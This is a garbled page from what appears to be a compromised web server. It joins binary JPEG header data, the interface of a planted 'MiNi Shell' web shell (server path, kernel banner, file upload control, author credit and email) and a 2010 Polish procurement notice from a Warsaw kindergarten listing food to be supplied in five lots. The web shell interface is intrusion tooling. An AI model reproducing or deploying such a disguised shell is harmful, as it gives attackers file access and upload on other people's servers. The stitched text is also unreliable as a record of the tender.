JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101203/395888-N-2010.html

<p class="kh_header"><b>Warszawa: Dostawa artykułów spożywczych z podziałem na 5 pakietów.</b><br>
<b>Numer ogłoszenia: 395888 - 2010; data zamieszczenia: 03.12.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Nr 41 "Wiślana Kropelka" , ul. L. Kruczkowskiego 12 b, 00-380 Warszawa, woj. mazowieckie, tel. 889 205 077.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www. kropelka41.republika.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna samorządowa jednostka organizacyjna..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych z podziałem na 5 pakietów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów spożywczych z podziałem na 5 pakietów: 1: Pieczywo wyroby piekarskie 2: Nabiał 3: Warzywa, Owoce, Mrożonki, Jaja 4: Mięso, Wędliny 5: Produkty pozostałe..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9, 15.50.00.00-3, 15.30.00.00-1, 03.20.00.00-3, 03.10.00.00-2, 03.14.25.00-3, 15.10.00.00-9, 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 03.01.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz. U. nr 113 z 2010 r. poz. nr 759 z późn. zmian. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz. U. nr 113 z 2010 r. poz. nr 759 z późn. zmian. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga udokumentowania spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz. U. nr 113 z 2010 r. poz. nr 759 z późn. zmian. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz. U. nr 113 z 2010 r. poz. nr 759 z późn. zmian. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ogólny oferty; oferta cenowa; pełnomocnictwa dla osób podpisujących ofertę; ustanowienie pełnomocnika do reprezentowania Wykonawców ubiegających się wspólnie o udzielenie zamówienia w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy;wpis do ewidencji działalności gospodarczej lub inny dokument, z którego wynika umocowanie do reprezentowania wykonawcy, o ile nie jest to przedłożone w ramach załącznika Nr 4</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Nie przewiduje się zmian postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy z wyjątkiem zmian, których konieczność wprowadzenia wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, lub zmiany te są korzystne dla Zamawiającego, zmian przewidzianych w § 2 ust. 3 projektu umowy załączonego SIWZ, a nadto gdy: 1. nastąpią przekształcenia własnościowe, 2. nastąpią zmiany techniczne lub organizacyjne, 3. nastąpią zmiany adresu, 4. zmianie ulega nr katalogowy lub wielkość opakowań, przy czym cena musi być proporcjonalna do ceny podanej w ofercie, 5. następuje konieczność poprawienia pomyłek, 6. Wykonawca nie dostarczy przedmiotu umowy w terminie określonym w § 1 ust. 3, Zamawiający zastrzega sobie prawo dokonania zakupu interwencyjnego od innego Wykonawcy w ilości i asortymencie niezrealizowanej w terminie dostawy. W przypadku zakupu interwencyjnego zmniejsza się wielkość przedmiotu umowy o wielkość tego zakupu, 7. wprowadza się zamienniki o właściwościach takich samych lub lepszych (w razie zakończenia produkcji , wstrzymania, wycofania produkcji) - cena nie wyższa niż w ofercie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kropelka41.republika.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PRZEDSZKOLE Nr 41 WIŚLANA KROPELKA
00-380 WARSZAWA, UL. L. KRUCZKOWSKIEGO 12 B.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2010 godzina 12:30, miejsce: PRZEDSZKOLE Nr 41 WIŚLANA KROPELKA
00-380 WARSZAWA, UL. L. KRUCZKOWSKIEGO 12 B.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PIECZYWO, WYROBY PIEKARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułka Kajzerka 40 g	szt	2000
Bułka Wrocławska 250 g	kg	1250
Bułka Grahamka 100 g	szt	2000
Drożdżówka z jabłkiem 60 g	szt	200
Drożdżówka z serem 60 g	szt	500
Drożdżówka z budyniem 60 g	szt	500
Rogal min. 100 g	szt	2200
Paluch  min. 100 g	szt	500
Chałka duża 350 g	szt	120
Chleb biały duży 570 g	szt	1000
Chleb razowy 500 g	szt	350
Chleb razowy z ziarnem 500 g	szt	350
Pączki 50 g	szt	1000
Croissant francuski 70 g	szt	500
Ciasto drożdżowe	kg.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.14.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> NABIAŁ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Masło w kostkach 200g	op.	1 550
Mleko 3,2% pasteryzowane - opakowanie foliowe	litr	7 460
Actimel	op.	1 000
Twaróg półtłusty	kg	250
Ser topiony 40% tł. 100 g	szt.	460
Śmietana do zupy 18% 0,5 l	op.	470
Śmietana gęsta 18% 0,4l	op.	380
Deser ze śmietaną min. 175 g	op.	500
Deser pianka min. 90 g	op.	500
Jogurt 150 g	op.	700
Jogurt pitny 1l	op.	20
Serek homogenizowany min. 140 g	op.	500
Serek homogenizowany waniliowy min. 200 g	op.	45
Śmietana tortowa 36% 0,5l	op.	10
Ser żółty 45% tł, 90% s.w.s.	kg.	100
Serek homogenizowany waniliowy puszysty min. 100 g	op.	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> WARZYWA , OWOCE, MROŻONKI, JAJKA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Arbuz	kg	90
Banany	kg	310
Botwina	szt.	15
Buraki	kg	120
Brokuły	szt.	40
Brzoskwinie	kg.	60
Brukselka	kg.	20
Cebula	kg	90
Cykoria	kg	30
Cytryny	szt.	15
Czosnek	kg	40
Czereśnie	kg	20
Dymka	szt.	30
Fasola Jaś	szt.	31
Fasolka szparagowa	kg	30
Groch łuskany	kg	22
Gruszki	kg	16
Jabłka 	kg	1300
Kalafior	kg	10
Kapusta biała	kg	40
Kapusta czerwona	kg	40
Kapusta kiszona	szt.	160
Kapusta młoda	kg	25
Kapusta pekińska	szt.	50
Kapusta włoska	kg	100
Kiwi	szt.	1200
Koper pęczek świeży	szt.	50
Mandarynki	kg	160
Marchew	kg	80
Natka pietruszki świeża	szt.	430
Ogórki kiszone	kg	95
Ogórki świeże	kg	105
Papryka	kg	40
Pomarańcze	kg	120
Pomidory	kg	70
Pieczarki	kg	75
Por	szt.	20
Rzodkiew biała	kg	25
Rzodkiewka	szt.	120
Rabarbar	kg.	10
Szczypior pęczek	szt.	120
Seler korzeń	kg	25
Szczaw świeży	kg	10
Sałata	szt.	260
Sałata lodowa	szt.	50
Śliwki	kg	200
Truskawki świeże (w sezonie)	kg	50
Włoszczyzna (świeża pęczek)	szt.	460
Wiśnie	kg	20
Winogrona	kg	50
Ziemniaki	kg	2900
Mieszanka warzywna mrożonka min. 450 g	op.	100
Mieszanka owocowa mrożonka min. 450 g	kg	100
Wiśnie mrożone min. 400 g	op.	90
Porzeczka czarna mrożona min. 400 g	op.	250
Truskawki mrożone min. 400 g	op.	175
Kalafior mrożony min. 400 g	op.	125
Marchewka kostka mrożona min. 450 g	op.	120
Marchewka z groszkiem mrożona min. 450 g	op.	70
Brukselka mrożona min. 450 g	op.	25
Brokuly mrożone min. 450 g	op.	90
Fasolka szparagowa mrożona min. 450 g	op.	90
Szpinak mrożony min. 400 g	op.	25
Śliwki mrożone min. 450 g	op.	45
Jaja wielkość L	szt.	4600
Morele suszone	kg.	23
Żurawina suszona	kg	10
Chrupki kukurydziane  min. 110 g	op.	180
Morele świeże	kg.	20
Orzechy włoskie	kg.	8
Owoce suszone	kg.	4
Sezam	kg.	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3, 03.10.00.00-2, 03.14.25.00-3, 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> MIĘSO, WĘDLINY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Schab bez kości śrd	kg	85
Schab z kością śrd	kg	30
Schab karkowy z kością	kg	50
Schab  karkowy bez kości	kg	50
Łopatka bez kości i skóry	kg	150
Szynka bez kości	kg	210
Żebra trójkąt	kg	180
Bok surowy	kg	10
Wołowe bez kości ekstra	kg	50
Rostbef bez kości	kg	20
Szponder	kg	20
Łata	kg	20
Zad cielęcy bez kości	kg	20
Kurczak świeży	kg	50
Filet z kurczaka	kg	50
Ćwiartka kurczaka	kg	20
Uda drobiowe	kg	25
Pałki z kurczaka	kg	50
Skrzydełka kurczak	kg	10
Korpusy	kg	100
Filet z indyka	kg	20
Udziec z indyka	kg	30
Skrzydło indyk	kg	20
Mięso drobne z indyka I	kg	35
Mięso drobiowe mielone	kg	37
Wątróbka drobiowa	kg	20
Baleron	kg	25
Golonka - wędlina	kg	25
Indyk faszerowany	kg	25
Kiełbasa wieprzowa podsuszana gruba typu: Krakowska	kg	45
Kiełbasa wieprzowa cienka typu: Podwawelska	kg	45
Kiełbasa wieprzowa typu: Szynkowa	kg	45
Kiełbasa wieprzowa typu: Mortadela	kg	25
Kiełbasa typu: Salami	kg	25
Kiełbasa drobiowa	kg	25
Wędlina wieprzowa typu: Mielonka	kg	25
Parówki wieprzowe  odtłuszczone	kg	30
Polędwica sopocka	kg	45
Polędwica drobiowa	kg	45
Szynka wieprzowa	kg	50
Szynka drobiowa	kg	45
Szynka konserwowa	kg	45
Schab pieczony	kg	20
Słonina	kg	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PRODUKTY  POZOSTAŁE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananas w puszce min. 560 g	op.	210
Barszcz biały min. 30 g	op.	80
Bułka tarta 500 g	op.	360
Budyń na 0,5 l	op.	750
Brzoskwinie w puszce min. 820 g	op.	120
Batonik mleczny typu Kinder min. 42 g	szt.	200
Baton zbożowy min. 50 g	szt.	300
Wafelek w czekoladzie min. 20 g	szt.	800
Cukier puder 400 g	op.	30
Cukier waniliowy min. 32 g	op.	100
Chrzan tarty słoik min. 260 g	op.	22
Ciastka - herbatniki typu Be Be 16 g 	op.	400
Ciastka - pierniki na wagę	kg	12
Ciastka różne na wagę	kg	45
Ciastka wafelki na wagę	kg	30
Dżem wiśniowy 300 g	op.	95
Drożdże	op.	20
Fasolka konserwowa min. 400 g	op.	45
Groszek konserwowy  400 g	op.	60
Galaretka różne smaki na 0,5 l	op.	300
Herbata 20 szt.	op.	20
Herbata 100 szt.	op.	60
Herbata owocowa 20 szt.	op.	80
Herbata typu Vitax owoc. 20 szt.	op.	35
Jabłka prażone na szarlotkę 900 g	op.	15
Jajko niespodzianka 20 g	szt.	210
Kawa zbożowa 150 g	op.	80
Kasza gryczana 4x100g	op.	120
Kasza gryczana 900 g	op.	25
Kasza manna 1 kg	op.	45
Kasza jęczmienna 400 g	op.	50
Kasza jęczmienna 4x100 g	op.	135
Kakao rozpuszczalne min. 400 g	op.	60
Kakao 100 g	op.	30
Kukurydza w puszce min. 340 g	op.	55
Koncentrat pomidorowy 200 g	op.	120
Ketchup łagodny min. 480 g	op.	35
Kisiel na 0,5 l	op.	900
Koncentrat buraczany min. 300 ml	op.	50
Konserwa tuńczyk min. 185 g	op.	40
Filet śledziowy w sosie pomidorowym - puszka min. a 170 g	op.	24
Filet z makreli w oleju puszka min a 170 g	op.	24
Filet z makreli w sosie pomidorowym puszka min a 170 g	op.	24
Filet śledziowy w oleju - puszka min. a 170 g	op.	24
Kwasek cytrynowy 50 g	op.	90
Masło roślinne 250 g	op.	30
Majonez 400 g	op.	200
Miód w słoiku 400 g	op.	55
Mięta 20 szt	op.	70
Musztarda min. 200 g	op.	45
Mąka ziemniaczana 	kg	15
Krem czekoladowy typu Nutella 230 g	op.	36
Ogórki kiszone w słoiku min. 870 g	op.	30
Ogórki konserwowe w słoiku min. 870 g	op.	75
Ocet 1 l	op.	10
Pasztet drobiowy w puszce min. 155 g	op.	120
Płatki owsiane 500 g	op.	40
Płatki kukurydziane 500 g	op.	80
Płatki czekoladowe typu Nestle 250 g	op.	120
Płatki czekoladowe typu Nestle 500 g	op.	50
Płatki ryżowe min. 200 g	op.	160
Proszek do pieczenia 15 g	op.	50
Pieprz czarny mielony min. 25 g	op.	50
Pieprz czarny ziarnisty min. 25 g	op.	20
Przyprawa - bazylia min. 9 g	op.	100
Przyprawa - cynamon min. 15 g	op.	30
Przyprawa - goździki min. 10 g	op.	30
Przyprawa - liść laurowy min. 5 g	op.	80
Przyprawa - majeranek min. 8 g	op.	100
Przyprawa - oregano min. 8 g	op.	100
Przyprawa - tymianek min. 10 g	op.	100
Przyprawa papryka słodka min. 20 g	op.	30
Przyprawa papryka ostra min. 20 g	op.	30
Przyprawa curry min. 25 g	op.	50
Przyprawa - zioła prowansalskie min. 10 g	op.	50
Przyprawa ziele angielskie min. 15 g	op.	50
Przyprawa do drobiu min. 25 g	op.	30
Przyprawa do gyrosa min. 25 g	op.	30
Przyprawa do mięsa min. 20	op.	30
Przyprawa do ryb min. 30 g	op.	30
Rodzynki 200 g	op.	10
Ryż 4x100 g	op.	160
Ryż sypki min. 1 kg	op.	65
Ryż preparowany min. 50 g	op.	100
Sos sałatkowy min. 9 g	op.	350
Sos sojowy 150 ml	op.	10
Sok owocowy syrop min. 0,43 l	op	40
Smalec 200 g	op.	25
Szczaw konserwowy min. 270 g	op.	170
Śliwki suszone min. 500 g	kg.	10
Śmietana bita spray min. 250 g	op.	40
Woda mineralna 1,5 l niegazowana	op.	30
Woda mineralna 5l niegazowana	op.	10
Wiórki kokosowe min. 200 g	op.	20
Zacierki (makaron)min. 250 g	op.	130
Ziarenka smaku min. 120 g	op.	30
Żurek w proszku min. 42 g	op.	80
Kostka rosołowa 12 szt po min. 10 g	op.	50
Lody 1 kg	op.	32
Masa krówkowa min. 400 g	op.	12
Płatki musli min. 300 g	op.	85
Cukierki czekoladowe	kg	10
Cukierki owocowe	kg	10
Wafle ryżowe min. 90 g	op.	96
Cukier	kg	650
Olej kujawski 1 l	op.	360
Mąka typu szymanowska 1 kg	op.	350
Makaron świderki 500 g	op.	200
Makaron spaghetti 500 g	op.	75
Makaron krajanka 500 g	op.	170
Makaron nitki 500 g	op.	80
Makaron Łazanki 500 g	op.	85
Sól 1 kg	op.	170
Soczek owocowy 200 ml kartonik 	op.	500
Sok z marchwi 1 l	op	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com